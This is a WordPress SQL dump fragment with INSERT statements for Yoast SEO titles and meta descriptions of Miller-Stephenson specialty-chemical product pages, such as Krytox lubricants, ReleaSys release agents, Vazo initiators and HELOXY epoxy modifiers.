INSERT INTO `wp_postmeta` VALUES (18934, 290, '_yoast_wpseo_title', 'Composite Mold Release Agent | Water-based | ReleaSys 8800'); 
INSERT INTO `wp_postmeta` VALUES (18935, 293, '_yoast_wpseo_title', 'Rubber Molding Release Agent | ReleaSys 8500 | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (18936, 297, '_yoast_wpseo_title', 'PTFE Water-based Release Agents | Dry Film Release | ReleaSys 8200'); 
INSERT INTO `wp_postmeta` VALUES (18937, 310, '_yoast_wpseo_title', 'Urethane Mold Release Agent | Semi-Permanent | ReleaSys 8900'); 
INSERT INTO `wp_postmeta` VALUES (18938, 400, '_yoast_wpseo_title', 'Water-based PTFE Release Agent | Dry Film Release Agent | ReleaSys 82'); 
INSERT INTO `wp_postmeta` VALUES (18939, 419, '_yoast_wpseo_title', 'Rubber Mold Release Agents | Elastomer Release Agent | ReleaSys 85'); 
INSERT INTO `wp_postmeta` VALUES (18940, 423, '_yoast_wpseo_title', 'Water-based mold release agent | Composites-Polyurethane | ReleaSys 88'); 
INSERT INTO `wp_postmeta` VALUES (18941, 425, '_yoast_wpseo_title', 'Semi-Permanent Release Agents | Composite Mold Release Agent |'); 
INSERT INTO `wp_postmeta` VALUES (18942, 455, '_yoast_wpseo_title', 'ReleaSys Release Agent | Semi-Permanent | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (18943, 2, '_yoast_wpseo_title', 'Miller-Stephenson Sample'); 
INSERT INTO `wp_postmeta` VALUES (18944, 467, '_yoast_wpseo_title', 'ShieldSys Compounding Additives'); 
INSERT INTO `wp_postmeta` VALUES (18945, 473, '_yoast_wpseo_title', 'SolvSys Medical Solvents'); 
INSERT INTO `wp_postmeta` VALUES (18946, 1287, '_yoast_wpseo_title', 'Opteon™ Sion - Specialty Fluid - No Ozone Depletion Potential'); 
INSERT INTO `wp_postmeta` VALUES (18947, 1722, '_yoast_wpseo_title', 'Conductive Coating | RFI Nickel Conductive Coatings | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (18948, 1724, '_yoast_wpseo_title', 'Rust Inhibitor'); 
INSERT INTO `wp_postmeta` VALUES (18949, 1825, '_yoast_wpseo_title', 'Miller-Stephenson SDS'); 
INSERT INTO `wp_postmeta` VALUES (18950, 1842, '_yoast_wpseo_title', 'Miller-Stephenson SDS'); 
INSERT INTO `wp_postmeta` VALUES (18951, 1871, '_yoast_wpseo_title', 'Miller-Stephenson Specialty Products & Solvents'); 
INSERT INTO `wp_postmeta` VALUES (18952, 122, '_yoast_wpseo_title', 'Miller-Stephenson Technical Support - Questions & Answers'); 
INSERT INTO `wp_postmeta` VALUES (18953, 1097, '_yoast_wpseo_title', 'Teflon Heavy Equipment Grease | Miller-Stephenson Chemical'); 
INSERT INTO `wp_postmeta` VALUES (18954, 1102, '_yoast_wpseo_title', 'Teflon High Temp Grease | Extreme Pressure | High Speed'); 
INSERT INTO `wp_postmeta` VALUES (18955, 1104, '_yoast_wpseo_title', 'Teflon Severe Service Grease | Grease for Factory Applications'); 
INSERT INTO `wp_postmeta` VALUES (18956, 1106, '_yoast_wpseo_title', 'Teflon White Lithium Grease | Miller-Stephenson Chemicals'); 
INSERT INTO `wp_postmeta` VALUES (18957, 1344, '_yoast_wpseo_title', 'Opteon™ Suprion Cleaning Agent | Carrier Fluid | Solvent'); 
INSERT INTO `wp_postmeta` VALUES (18958, 1712, '_yoast_wpseo_title', 'SolvSys Surface PrepClean™ MS-255/257'); 
INSERT INTO `wp_postmeta` VALUES (18959, 1801, '_yoast_wpseo_title', 'Teflon Multi-Use | Aerosol Lubricant | Wear & Corrosion Protection'); 
INSERT INTO `wp_postmeta` VALUES (18960, 1819, '_yoast_wpseo_title', 'Teflon Silicone Lubricant | Prevents Rust & Corrosion'); 
INSERT INTO `wp_postmeta` VALUES (18961, 1852, '_yoast_wpseo_title', 'Miller-Stephenson Spray Trigger'); 
INSERT INTO `wp_postmeta` VALUES (18962, 662, '_yoast_wpseo_title', 'The Chemours Company Selects Wilmington, Delaware for Its Global Headquarters'); 
INSERT INTO `wp_postmeta` VALUES (18963, 1077, '_yoast_wpseo_title', 'Krytox TM7 Tire Mold Grease'); 
INSERT INTO `wp_postmeta` VALUES (18964, 1637, '_yoast_wpseo_title', 'TriboSys™ 211X General Purpose Oils | Miller-Stephenson Chemical'); 
INSERT INTO `wp_postmeta` VALUES (18965, 1638, '_yoast_wpseo_title', 'Chain Oils | TriboSys™ 212X Series | High Temperature'); 
INSERT INTO `wp_postmeta` VALUES (18966, 1643, '_yoast_wpseo_title', 'Gear Box Lubricants | TriboSys™ 214X & 215X Series'); 
INSERT INTO `wp_postmeta` VALUES (18967, 1644, '_yoast_wpseo_title', 'Compressor Lubricant | TriboSys™ 216X Series Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (18968, 1645, '_yoast_wpseo_title', 'Hydraulic Oils | TriboSys™ 217X Series Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (18969, 1662, '_yoast_wpseo_title', 'TriboSys 110XN Thin Film Aerosol Krytox'); 
INSERT INTO `wp_postmeta` VALUES (18970, 1664, '_yoast_wpseo_title', 'TriboSys 110XNB Thin Film Aerosol Krytox'); 
INSERT INTO `wp_postmeta` VALUES (18971, 1666, '_yoast_wpseo_title', 'TriboSys 120X Thin Film Aerosol Krytox'); 
INSERT INTO `wp_postmeta` VALUES (18972, 427, '_yoast_wpseo_title', 'VAZO 64 Radical Initiator | AIBN | Azobisisobutyronitrile | Polymerization'); 
INSERT INTO `wp_postmeta` VALUES (18973, 468, '_yoast_wpseo_title', 'TriboSys™ Fluorinated Synthetic Biocompatible Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (18974, 568, '_yoast_wpseo_title', 'Vazo 52 | Azo Free Radical initiator | Polymerization Initiators |'); 
INSERT INTO `wp_postmeta` VALUES (18975, 989, '_yoast_wpseo_title', 'Krytox TS4 Thread Sealant | Teflon Tape Alternative | Superior Performance'); 
INSERT INTO `wp_postmeta` VALUES (18976, 1100, '_yoast_wpseo_title', 'Food Grade Silicone Aerosol | TriboSys™ 2200 Series Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (18977, 1646, '_yoast_wpseo_title', 'Roller Chain Oils | TriboSys 218X Series Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (18978, 1647, '_yoast_wpseo_title', 'General Purpose Greases | TriboSys 221X Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (18979, 1648, '_yoast_wpseo_title', 'High Temperature Greases | TriboSys™ 222X Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (18980, 1649, '_yoast_wpseo_title', 'TriboSys™ 223X Multi-Purpose Food Grade Greases'); 
INSERT INTO `wp_postmeta` VALUES (18981, 575, '_yoast_wpseo_title', 'VAZO 67 Radical Initiator | Azo Initiators | AMBN | Polymerization Initiator'); 
INSERT INTO `wp_postmeta` VALUES (18982, 577, '_yoast_wpseo_title', 'VAZO 88 Radical Initiator | Azo Radical Initiator | ACHN |'); 
INSERT INTO `wp_postmeta` VALUES (18983, 943, '_yoast_wpseo_title', 'Krytox VPF 1506 Vacuum Pump Fluids - Nonflammable'); 
INSERT INTO `wp_postmeta` VALUES (18984, 944, '_yoast_wpseo_title', 'Krytox VPF 1514 Vacuum Pump Fluid - Nonflammable'); 
INSERT INTO `wp_postmeta` VALUES (18985, 954, '_yoast_wpseo_title', 'Krytox VPF 1525 Vacuum Pump Fluid - Nonflammable'); 
INSERT INTO `wp_postmeta` VALUES (18986, 1263, '_yoast_wpseo_title', 'Vertrel MCA Specialty Fluid - Precision Cleaning - Product Information'); 
INSERT INTO `wp_postmeta` VALUES (18987, 1268, '_yoast_wpseo_title', 'Vertrel SDG Specialty Fluid | Precision Cleaning and Degreasing'); 
INSERT INTO `wp_postmeta` VALUES (18988, 1276, '_yoast_wpseo_title', 'Vertrel SFR Specialty Fluid | Lead Free and No Clean Flux Removal'); 
INSERT INTO `wp_postmeta` VALUES (18989, 1278, '_yoast_wpseo_title', 'Vertrel XF Specialty Fluid | Precision Cleaning Solvent | Rinsing Agent'); 
INSERT INTO `wp_postmeta` VALUES (18990, 1601, '_yoast_wpseo_title', 'Vazo Free Radical Initiator: Benefits and Uses - Polymerization'); 
INSERT INTO `wp_postmeta` VALUES (18991, 672, '_yoast_wpseo_title', 'Krytox XHT AC High Temperature Grease | Anti-Wear | Rust Protection'); 
INSERT INTO `wp_postmeta` VALUES (18992, 674, '_yoast_wpseo_title', 'Krytox XHT-ACX High Temperature Grease | Anti-Wear | Rust Protection'); 
INSERT INTO `wp_postmeta` VALUES (18993, 675, '_yoast_wpseo_title', 'Krytox XHT-BD High Temperature Grease | Non-Melting'); 
INSERT INTO `wp_postmeta` VALUES (18994, 696, '_yoast_wpseo_title', 'Krytox XHT-BDZ High Temperature Grease | Non-Melting'); 
INSERT INTO `wp_postmeta` VALUES (18995, 697, '_yoast_wpseo_title', 'Krytox XHT-BDX High Temperature Grease | Non-Melting'); 
INSERT INTO `wp_postmeta` VALUES (18996, 707, '_yoast_wpseo_title', 'Krytox XHT-500 High Temperature Oils'); 
INSERT INTO `wp_postmeta` VALUES (18997, 708, '_yoast_wpseo_title', 'Krytox XHT-1000 High Temperature Oils'); 
INSERT INTO `wp_postmeta` VALUES (18998, 1121, '_yoast_wpseo_title', 'Vertrel fluids are a suitable replacement for nPB - Authorized Distributor'); 
INSERT INTO `wp_postmeta` VALUES (18999, 1683, '_yoast_wpseo_title', 'Vydax™ NRT 960'); 
INSERT INTO `wp_postmeta` VALUES (19000, 659, '_yoast_wpseo_title', 'Krytox XHT-S High Temperature Grease - PTFE Thickened'); 
INSERT INTO `wp_postmeta` VALUES (19001, 671, '_yoast_wpseo_title', 'Krytox XHT-SX High Temperature Grease - PTFE Thickened'); 
INSERT INTO `wp_postmeta` VALUES (19002, 992, '_yoast_wpseo_title', 'Krytox XP 1A0 Bearing Oil'); 
INSERT INTO `wp_postmeta` VALUES (19003, 993, '_yoast_wpseo_title', 'Krytox XP 1A1 Bearing Oil'); 
INSERT INTO `wp_postmeta` VALUES (19004, 995, '_yoast_wpseo_title', 'Krytox XP 1A2 Bearing Oil'); 
INSERT INTO `wp_postmeta` VALUES (19005, 996, '_yoast_wpseo_title', 'Krytox XP 1A3 Bearing Oil'); 
INSERT INTO `wp_postmeta` VALUES (19006, 997, '_yoast_wpseo_title', 'Krytox XP 1A4 Bearing Oil'); 
INSERT INTO `wp_postmeta` VALUES (19007, 998, '_yoast_wpseo_title', 'Krytox XP 1A5 Bearing Oil'); 
INSERT INTO `wp_postmeta` VALUES (19008, 999, '_yoast_wpseo_title', 'Krytox XP 1A6 Bearing Oil'); 
INSERT INTO `wp_postmeta` VALUES (19009, 1001, '_yoast_wpseo_title', 'Krytox XP 1A7 Bearing Oil'); 
INSERT INTO `wp_postmeta` VALUES (19010, 1002, '_yoast_wpseo_title', 'Krytox XP 2A0 Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (19012, 1009, '_yoast_wpseo_title', 'Krytox XP 2A1 Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (19013, 1010, '_yoast_wpseo_title', 'Krytox XP 2A0 Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (19014, 1011, '_yoast_wpseo_title', 'Krytox XP 2A3 Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (19015, 1014, '_yoast_wpseo_title', 'Krytox XP 2A4 Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (19016, 1012, '_yoast_wpseo_title', 'Krytox XP 2A5 Bearing Grease - Anti - Corrosion Protection'); 
INSERT INTO `wp_postmeta` VALUES (19017, 1015, '_yoast_wpseo_title', 'Krytox XP 2A6 Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (19018, 1016, '_yoast_wpseo_title', 'Krytox XP 2A7 Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (19019, 452, '_yoast_wpseo_metadesc', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.'); 
INSERT INTO `wp_postmeta` VALUES (19020, 579, '_yoast_wpseo_metadesc', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.'); 
INSERT INTO `wp_postmeta` VALUES (19021, 580, '_yoast_wpseo_metadesc', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.'); 
INSERT INTO `wp_postmeta` VALUES (19022, 581, '_yoast_wpseo_metadesc', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.'); 
INSERT INTO `wp_postmeta` VALUES (19023, 582, '_yoast_wpseo_metadesc', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.'); 
INSERT INTO `wp_postmeta` VALUES (19024, 583, '_yoast_wpseo_metadesc', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.'); 
INSERT INTO `wp_postmeta` VALUES (19027, 956, '_yoast_wpseo_metadesc', 'Like the other Krytox fluorinated oils, Krytox 157 FS lubricant is insoluble in most common organic solvents. It is also nonflammable. Decarboxylation occurs on heating above about 170 °C (338 °F) and becomes vigorous at 200 °C (392 °F). The product formed appears to be a mixture, but is mainly a hydro-endcapped version of Krytox fluorinated oil. The decarboxylation of its alkali metal salts in the presence of water occurs at lower temperatures and yields essentially pure polymers end capped with hydrogen.'); 
INSERT INTO `wp_postmeta` VALUES (19028, 960, '_yoast_wpseo_metadesc', 'Like the other Krytox fluorinated oils, Krytox 157 FS lubricant is insoluble in most common organic solvents. It is also nonflammable. Decarboxylation occurs on heating above about 170 °C (338 °F) and becomes vigorous at 200 °C (392 °F). The product formed appears to be a mixture, but is mainly a hydro-endcapped version of Krytox fluorinated oil. The decarboxylation of its alkali metal salts in the presence of water occurs at lower temperatures and yields essentially pure polymers end capped with hydrogen.'); 
INSERT INTO `wp_postmeta` VALUES (19029, 638, '_yoast_wpseo_metadesc', 'Krytox 240AZ grease is white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19030, 642, '_yoast_wpseo_metadesc', 'Krytox 240AA grease is a white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19031, 643, '_yoast_wpseo_metadesc', 'Krytox 240AB grease is white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19032, 644, '_yoast_wpseo_metadesc', 'Krytox 240AC grease is white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19033, 645, '_yoast_wpseo_metadesc', 'Krytox 240AD grease is a white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19034, 646, '_yoast_wpseo_metadesc', 'Krytox 250AZ EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19035, 647, '_yoast_wpseo_metadesc', 'Krytox 250AC EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19036, 648, '_yoast_wpseo_metadesc', 'Krytox 250AD EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19037, 649, '_yoast_wpseo_metadesc', 'Krytox 280AB anticorrosion grease is white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures.'); 
INSERT INTO `wp_postmeta` VALUES (19038, 651, '_yoast_wpseo_metadesc', 'Krytox 280AC anticorrosion grease is white grease that contain sodium nitrite. These grades provide rust protection at ambient temperatures.'); 
INSERT INTO `wp_postmeta` VALUES (19039, 652, '_yoast_wpseo_metadesc', 'Krytox 283AZ anticorrosion grease is a white grease that contains sodium nitrite. These grades provide rust protection at ambient temperatures.'); 
INSERT INTO `wp_postmeta` VALUES (19040, 653, '_yoast_wpseo_metadesc', 'Krytox 283AA anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures.'); 
INSERT INTO `wp_postmeta` VALUES (19041, 654, '_yoast_wpseo_metadesc', 'Krytox 283AB anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures.'); 
INSERT INTO `wp_postmeta` VALUES (19042, 655, '_yoast_wpseo_metadesc', 'Krytox 283AC anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures.'); 
INSERT INTO `wp_postmeta` VALUES (19043, 656, '_yoast_wpseo_metadesc', 'Krytox 283AD anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures.'); 
INSERT INTO `wp_postmeta` VALUES (19044, 204, '_yoast_wpseo_metadesc', 'About Miller-Stephenson Chemical Company, we specializes in providing the most efficient and highest performing chemical solutions to all industrial sectors'); 
INSERT INTO `wp_postmeta` VALUES (19045, 489, '_yoast_wpseo_metadesc', 'Aero Duster MS-222N is a pure, nonflammable way to remove microscopic dust. Recommended for electromechanical instruments, computer equipment, and optics.'); 
INSERT INTO `wp_postmeta` VALUES (19046, 664, '_yoast_wpseo_metadesc', 'Miller-Stephenson is not only a manufacturer of performance chemicals but also a resource for technical and application advice, expertise and information.'); 
INSERT INTO `wp_postmeta` VALUES (19047, 1072, '_yoast_wpseo_metadesc', 'Krytox AGL 683 grease contains extreme pressure and anticorrosion additives for applications in corrosive atmospheres or with significant shock loading.'); 
INSERT INTO `wp_postmeta` VALUES (19048, 713, '_yoast_wpseo_metadesc', 'Krytox AUT 2045 is a white grease based on perfluoropolyether (PFPE). PFPE lubricants demonstrate outstanding product life and unequaled performance.'); 
INSERT INTO `wp_postmeta` VALUES (19049, 714, '_yoast_wpseo_metadesc', 'Krytox AUT 2245 grease addresses a broad range of applications from o-ring to bearing lubrication over a wide temperature range.'); 
INSERT INTO `wp_postmeta` VALUES (19050, 715, '_yoast_wpseo_metadesc', 'Krytox AUT 2A45 grease is formulated with soluble additives that exhibit excellent resistance to water washout, and repel moisture.'); 
INSERT INTO `wp_postmeta` VALUES (19051, 717, '_yoast_wpseo_metadesc', 'Krytox AUT 2E45 grease is a nitrite-free lubricant, formulated with anti-rust additives that are effective at low concentration levels.'); 
INSERT INTO `wp_postmeta` VALUES (19052, 1128, '_yoast_wpseo_metadesc', 'FluoroExtreme is a fluorinated synthetic dental handpiece lubricant designed to outperform all industry standard alternatives. Biocompatible: ISO 10993'); 
INSERT INTO `wp_postmeta` VALUES (19053, 1292, '_yoast_wpseo_metadesc', 'MS-530N Contact Re-Nu is efficient cleaning agent that restores electrical continuity on all types of contacts.Removes oxides, oil, grease from contacts.'); 
INSERT INTO `wp_postmeta` VALUES (19054, 1851, '_yoast_wpseo_metadesc', 'A patented aerosol accessory. When combined with the Aero-Duster®, the Cobra® Duster provides a powerful, non-contact, easy to use delivery system. Designed for critical and hard-to-reach areas on electronic, photographic and computer equipment.'); 
INSERT INTO `wp_postmeta` VALUES (19055, 967, '_yoast_wpseo_metadesc', 'Krytox EG 2000 grease is non-reactive and non-flammable. It has the same properties as the 143 series oil but thickened into a grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19056, 968, '_yoast_wpseo_metadesc', 'Krytox EG 3000 grease is non-reactive and non-flammable. It has the same properties as the 143 series oil but thickened into a grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19058, 469, '_yoast_wpseo_metadesc', 'Fluoropolymer medical coatings designed for medical guidewires and devices, optimized coating adhesion, durability, corrosion resistance, minimal friction.'); 
INSERT INTO `wp_postmeta` VALUES (19059, 474, '_yoast_wpseo_metadesc', 'FluoroExtreme™ are fluorinated synthetic dental handpiece lubricants specially designed to provide superior performance and quieter operation.'); 
INSERT INTO `wp_postmeta` VALUES (19060, 984, '_yoast_wpseo_metadesc', 'Krytox FPG 028 MIL-PRF-27617 TYPE IV is resistant to hydrocarbon fuel and liquid oxygen, and to be used as a lubricant in aircraft, aerospace vehicles.'); 
INSERT INTO `wp_postmeta` VALUES (19061, 1428, '_yoast_wpseo_metadesc', 'Fluoroguard™ PCA is a colorless, odorless, nonflammable, and chemically inert polymer compounding additive based on fluorinated synthetic oil (perfluoropolyether). It has excellent color and UV/thermal stability. Added to plastics and elastomers, it improves the processing and performance of products.'); 
INSERT INTO `wp_postmeta` VALUES (19062, 1431, '_yoast_wpseo_metadesc', 'Fluoroguard™ SG is a colorless, odorless, nonflammable, and chemically inert polymer compounding additive based on fluorinated synthetic oil (perfluoropolyether). It has excellent color and UV/thermal stability. Added to plastics and elastomers, it improves the processing and performance of products.'); 
INSERT INTO `wp_postmeta` VALUES (19063, 1435, '_yoast_wpseo_metadesc', 'Fluoroguard™ PRO is a colorless, odorless, nonflammable, and chemically inert polymer compounding additive based on fluorinated synthetic oil (perfluoropolyether). It has excellent color and UV/thermal stability. Added to plastics and elastomers, it improves the processing characteristics and properties of polymer compounds.'); 
INSERT INTO `wp_postmeta` VALUES (19064, 973, '_yoast_wpseo_metadesc', 'Krytox FPG 182 has been specifically developed to operate over a wide temperature service range and in extreme chemical and vacuum conditions.'); 
INSERT INTO `wp_postmeta` VALUES (19065, 421, '_yoast_wpseo_metadesc', 'Krytox GPL 100 oils are clear, colorless, fluorinated synthetic oils that are nonreactive, nonflammable, safe in chemical and oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (19066, 436, '_yoast_wpseo_metadesc', 'Krytox GPL 101 oil is clear, colorless, fluorinated synthetic oil that is nonreactive, nonflammable, safe in chemical and oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (19067, 437, '_yoast_wpseo_metadesc', 'Krytox GPL 102 oil is clear, colorless, fluorinated synthetic oil that is nonreactive, nonflammable, safe in chemical and oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (19068, 438, '_yoast_wpseo_metadesc', 'Krytox GPL 103 oil is clear, colorless, fluorinated synthetic oil that is nonreactive, nonflammable, safe in chemical and oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (19069, 439, '_yoast_wpseo_metadesc', 'Krytox GPL 104 oil is clear, colorless, fluorinated synthetic oil that is nonreactive, nonflammable, safe in chemical and oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (19070, 440, '_yoast_wpseo_metadesc', 'Krytox GPL 105 oil is clear, colorless, fluorinated synthetic oil that is nonreactive, nonflammable, safe in chemical and oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (19071, 441, '_yoast_wpseo_metadesc', 'Krytox GPL 106 oil is clear, colorless, fluorinated synthetic oil that is nonreactive, nonflammable, safe in chemical and oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (19072, 442, '_yoast_wpseo_metadesc', 'Krytox GPL 107 oil is clear, colorless, fluorinated synthetic oil that is nonreactive, nonflammable, safe in chemical and oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (19073, 347, '_yoast_wpseo_metadesc', 'Krytox GPL 200 grease are white buttery greases with all of the same properties as the Krytox GPL 100 oil that they are made from, in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19074, 402, '_yoast_wpseo_metadesc', 'Krytox GPL 210 EP grease is a black grease that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19075, 769, '_yoast_wpseo_metadesc', 'Krytox GPL 201 grease are white buttery greases with all of the same properties as the Krytox GPL 101 oil that they are made from, in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19076, 783, '_yoast_wpseo_metadesc', 'Krytox GPL 202 grease are white buttery greases with all of the same properties as the Krytox GPL 102 oil that they are made from, in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19077, 784, '_yoast_wpseo_metadesc', 'Krytox GPL 203 grease are white buttery greases with all of the same properties as the Krytox GPL 103 oil that they are made from, in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19078, 788, '_yoast_wpseo_metadesc', 'Krytox GPL 204 grease are white buttery greases with all of the same properties as the Krytox GPL 104 oil that they are made from, in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19079, 789, '_yoast_wpseo_metadesc', 'Krytox GPL 205 grease are white buttery greases with all of the same properties as the Krytox GPL 105 oil that they are made from, in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19080, 790, '_yoast_wpseo_metadesc', 'Krytox GPL 206 grease are white buttery greases with all of the same properties as the Krytox GPL 106 oil that they are made from, in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19081, 814, '_yoast_wpseo_metadesc', 'Krytox GPL 207 grease are white buttery greases with all of the same properties as the Krytox GPL 107 oil that they are made from, in grease form.'); 
INSERT INTO `wp_postmeta` VALUES (19082, 818, '_yoast_wpseo_metadesc', 'Krytox GPL 211 EP grease is a black grease that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19083, 410, '_yoast_wpseo_metadesc', 'Krytox GPL 220 anti-corrosion greases are white greases that contain sodium nitrite. Excellent for applications which require an anti-corrosion additive.'); 
INSERT INTO `wp_postmeta` VALUES (19084, 819, '_yoast_wpseo_metadesc', 'Krytox GPL 212 EP grease is a black grease that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19086, 821, '_yoast_wpseo_metadesc', 'Krytox GPL 214 EP grease is a black grease that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19087, 822, '_yoast_wpseo_metadesc', 'Krytox GPL 215 EP grease is a black grease that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19088, 823, '_yoast_wpseo_metadesc', 'Krytox GPL 216 EP grease is a black grease that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19089, 824, '_yoast_wpseo_metadesc', 'Krytox GPL 217 EP grease is a black grease that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.'); 
INSERT INTO `wp_postmeta` VALUES (19090, 843, '_yoast_wpseo_metadesc', 'Krytox GPL 221 anti-corrosion greases are white greases that contain sodium nitrite. Excellent for applications which require an anti-corrosion additive.'); 
INSERT INTO `wp_postmeta` VALUES (19091, 844, '_yoast_wpseo_metadesc', 'Krytox GPL 223 anti-corrosion greases are white greases that contain sodium nitrite. Excellent for applications which require an anti-corrosion additive.'); 
INSERT INTO `wp_postmeta` VALUES (19092, 846, '_yoast_wpseo_metadesc', 'Krytox GPL 222 anti-corrosion greases are white greases that contain sodium nitrite. Excellent for applications which require an anti-corrosion additive.'); 
INSERT INTO `wp_postmeta` VALUES (19093, 847, '_yoast_wpseo_metadesc', 'Krytox GPL 224 anti-corrosion greases are white greases that contain sodium nitrite. Excellent for applications which require an anti-corrosion additive.'); 
INSERT INTO `wp_postmeta` VALUES (19094, 848, '_yoast_wpseo_metadesc', 'Krytox GPL 225 anti-corrosion greases are white greases that contain sodium nitrite. Excellent for applications which require an anti-corrosion additive.'); 
INSERT INTO `wp_postmeta` VALUES (19095, 850, '_yoast_wpseo_metadesc', 'Krytox GPL 226 anti-corrosion greases are white greases that contain sodium nitrite. Excellent for applications which require an anti-corrosion additive.'); 
INSERT INTO `wp_postmeta` VALUES (19096, 852, '_yoast_wpseo_metadesc', 'Krytox GPL 227 anti-corrosion greases are white greases that contain sodium nitrite. Excellent for applications which require an anti-corrosion additive.'); 
INSERT INTO `wp_postmeta` VALUES (19097, 1088, '_yoast_wpseo_metadesc', 'Some applications require electrical conductivity. In cases such as this Krytox GPL 246 is the perfect match for all your needs.'); 
INSERT INTO `wp_postmeta` VALUES (19098, 1111, '_yoast_wpseo_metadesc', 'Krytox GPL 407 grease is made using a nonmelting thickener instead of the normal Krytox PTFE. It is made for extreme high temperature applications.'); 
INSERT INTO `wp_postmeta` VALUES (19099, 1693, '_yoast_wpseo_metadesc', 'A strong, nonflammable flux remover spray containing an azeotrope blend of hydrofluoroethers with trans-1,2-dichloroethylene and isopropyl alcohol.'); 
INSERT INTO `wp_postmeta` VALUES (19100, 1212, '_yoast_wpseo_metadesc', 'HELOXY 116 Modifier is a commercial grade of 2-ethylhexyl glycidyl ether. A low viscosity, almost colorless monoepoxide, its primary use is the viscosity reducing modification of epoxy resin formulations.'); 
INSERT INTO `wp_postmeta` VALUES (19101, 1221, '_yoast_wpseo_metadesc', 'HELOXY™ Modifier 48 is a low viscosity aliphatic triglycidyl ether useful in the viscosity, reactivity, and performance modification of epoxy resin systems. Applications can be fast setting adhesives, Low temperature curing floor surfacing and concrete patching compounds, hard abrasion resistant clear castings and decoupage systems.'); 
INSERT INTO `wp_postmeta` VALUES (19102, 1227, '_yoast_wpseo_metadesc', 'HELOXY 107 is the diglycidyl ether of cyclohexane dimethanol that is primarily used as a reactive diluent or viscosity reducing modifier for epoxy.'); 
INSERT INTO `wp_postmeta` VALUES (19103, 1069, '_yoast_wpseo_metadesc', 'HELOXY 61 is a commercial grade butyl glycidyl ether. A low viscosity, colorless monoepoxide, it used in the viscosity reducing modification of epoxy resins'); 
